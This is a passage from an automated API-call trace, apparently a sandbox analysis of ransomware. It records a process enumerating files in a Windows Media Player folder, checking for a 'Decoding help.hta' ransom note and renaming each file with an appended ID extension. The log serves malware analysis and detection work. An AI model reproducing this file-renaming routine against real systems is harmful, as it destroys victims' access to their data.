ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmlaunch.exe.mui", cAlternateFileName="")) returned 1 [0042.252] lstrcpyW (in: lpString1=0x983a6a8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.253] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmlaunch.exe.mui") returned -1 [0042.253] lstrlenW (lpString="wmlaunch.exe.mui") returned 16 [0042.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="wmlaunch.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui" [0042.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui" [0042.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmlaunch.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmlaunch.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmlaunch.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.253] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMC.exe.mui", cAlternateFileName="")) returned 1 [0042.253] lstrcpyW (in: lpString1=0x983a6a8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.253] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMC.exe.mui") returned -1 [0042.253] lstrlenW (lpString="WMPDMC.exe.mui") returned 14 [0042.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="WMPDMC.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui" [0042.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui" [0042.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpdmc.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMC.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpdmc.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.533] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMCCore.dll.mui", cAlternateFileName="")) returned 1 [0042.792] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.792] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.792] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.792] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMCCore.dll.mui") returned -1 [0042.792] lstrlenW (lpString="WMPDMCCore.dll.mui") returned 18 [0042.792] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.792] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.792] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="WMPDMCCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" [0042.792] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" [0042.792] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpdmccore.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpdmccore.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.792] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfded41b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfded41b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmplayer.exe.mui", cAlternateFileName="")) returned 1 [0042.792] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.792] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.792] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.792] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmplayer.exe.mui") returned -1 [0042.792] lstrlenW (lpString="wmplayer.exe.mui") returned 16 [0042.793] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.793] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="wmplayer.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui" [0042.793] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui" [0042.793] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmplayer.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmplayer.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmplayer.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.793] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPMediaSharing.dll.mui", cAlternateFileName="")) returned 1 [0042.793] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.793] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.793] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPMediaSharing.dll.mui") returned -1 [0042.793] lstrlenW (lpString="WMPMediaSharing.dll.mui") returned 23 [0042.793] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.793] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="WMPMediaSharing.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" [0042.793] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" [0042.793] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpmediasharing.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpmediasharing.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.793] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnetwk.exe.mui", cAlternateFileName="")) returned 1 [0042.794] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.794] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.794] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.794] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.794] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnetwk.exe.mui") returned -1 [0042.794] lstrlenW (lpString="wmpnetwk.exe.mui") returned 16 [0042.794] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.794] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.794] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="wmpnetwk.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui" [0042.794] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui" [0042.794] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnetwk.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnetwk.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnetwk.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.810] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnscfg.exe.mui", cAlternateFileName="")) returned 1 [0042.810] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.810] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnscfg.exe.mui") returned -1 [0042.810] lstrlenW (lpString="wmpnscfg.exe.mui") returned 16 [0042.810] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="wmpnscfg.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui" [0042.810] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui" [0042.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnscfg.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnscfg.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\wmpnscfg.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.810] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnssci.dll.mui", cAlternateFileName="")) returned 1 [0042.810] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.811] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnssci.dll.mui") returned -1 [0042.811] lstrlenW (lpString="wmpnssci.dll.mui") returned 16 [0042.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="wmpnssci.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui" [0042.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui" [0042.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\wmpnssci.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" 